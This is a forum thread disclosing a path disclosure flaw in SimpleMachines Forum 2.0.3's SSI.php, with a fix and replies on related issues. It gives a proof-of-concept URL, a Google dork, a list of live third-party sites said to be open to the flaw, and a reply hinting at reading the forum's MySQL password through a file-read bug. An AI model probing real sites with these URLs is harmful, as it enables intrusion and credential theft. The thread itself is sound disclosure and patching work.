full Disclusore in SimpleMachines Forum <= 2.0.3

[yan.uniko.102]

*Summary:*
--------------
A security flaw allows an attacker to know the full path of the web system.

*Details:
-----------
SSI.php Line 294:
// Fetch a post with a particular ID. By default will only show if you have
permission to the see the board in question - this can be overriden.
function ssi_fetchPosts($post_ids, $override_permissions = false,
$output_method = 'echo')
{

$post_id is not defined. Possible fix: ($post_id = '')


*PoC:
-------
http://example.com/forumpath/SSI.php?ssi_function=fetchPosts [nofollow]

*Google Dorks:
---------------------
inurl:?index.php?action=help

*Demos:
-----------
http://simpleportal.net/SSI.php?ssi_function=fetchPosts [nofollow]
http://www.furgovw.org/SSI.php?ssi_function=fetchPosts [nofollow]
http://www.teachmideast.com/forum_old/SSI.php?ssi_function=fetchPosts [nofollow]
http://www.slowracing.com/jaxfox/SSI.php?ssi_function=fetchPosts [nofollow]
http://www.iptv2you.com/board/SSI.php?ssi_function=fetchPosts [nofollow]
http://voceteopr.com/SSI.php?ssi_function=fetchPosts [nofollow]
http://www.thesilverball.com/SSI.php?ssi_function=fetchPosts [nofollow]
http://othforums.com/SSI.php?ssi_function=fetchPosts [nofollow]
http://www.skinmod.eu/SSI.php?ssi_function=fetchPosts [nofollow]


Temporal Solution:
---------------------
SSI.php line 45:

Code Select Expand

$ssi_error_reporting = error_reporting(defined('E_STRICT') ? E_ALL | E_STRICT : E_ALL);

Replace:

Code Select Expand

$ssi_error_reporting = error_reporting(0);


Functions afected:
-----------------------
. fetchMember
. fetchPosts
. fetchGroupMembers
. queryMembers

Source:
--------
http://whk.drawcoders.net/index.php/topic,2792.0.html [nofollow]

Mirrors:
-------------------------
http://seclists.org/fulldisclosure/2013/Jan/14 [nofollow]
http://packetstormsecurity.com/files/119240/smf-disclose.txt [nofollow]
http://cxsecurity.com/issue/WLB-2013010025 [nofollow]
https://foro.elhacker.net/nivel_web/path_disclusore_en_simplemachines_forum_203-t379876.0.html [nofollow]

[Arantor]

It's not just fetchPosts that will cause this, actually. fetchMember, fetchGroupMembers, queryMembers are all vulnerable to this same bug.

If it wasn't for the fact that voting via SSI requires the query-via-HTTP function, I'd suggest disabling that entirely.

[vbgamer45]

Confirmed the second one allows reading any file. Seems to only return the first part of the file seems to be a limit of how much data it will take form the file. 20 lines but you can read other parts of the file using the line number if passed.

[yan.uniko.102]

Yes...

http://test.con/forum/index.php?action=...&line=37

to read MySQL Password of SimpleMachines.

[Nolt]

Hello,

I just checked and is strange, but on one server I couldn't read paths, but on other server where I have few SMF boards they was affected to this.
It could be possible that this hack depends from server configuration? (php.ini, my.ini etc.)

[Arantor]

Think you'll find a lot of this depends on having admin rights.

Not that there isn't an issue - because there is - but since it's not just open to everyone and everything, it's not the issue it might be.

[HauntIT]

Hello,

I just checked and is strange, but on one server I couldn't read paths, but on other server where I have few SMF boards they was affected to this.
It could be possible that this hack depends from server configuration? (php.ini, my.ini etc.)

Hi SMF Forum

This is my first post here, anyway:
Nolt: yes, this could depends of php.ini settings. Check if you have enable parameters like: register_globals, display_errors, and html_errors, etc and disable them. Then your errors should not be presented anymore. ('For debug' you can set +w to some file at your server and then send your logs there, but be carefull here too, because somewhere in your webapp-code could be LFI bug, and there you will be owned. )

Best regards,
Jakub

[emanuele]

Fixed in 2.0.4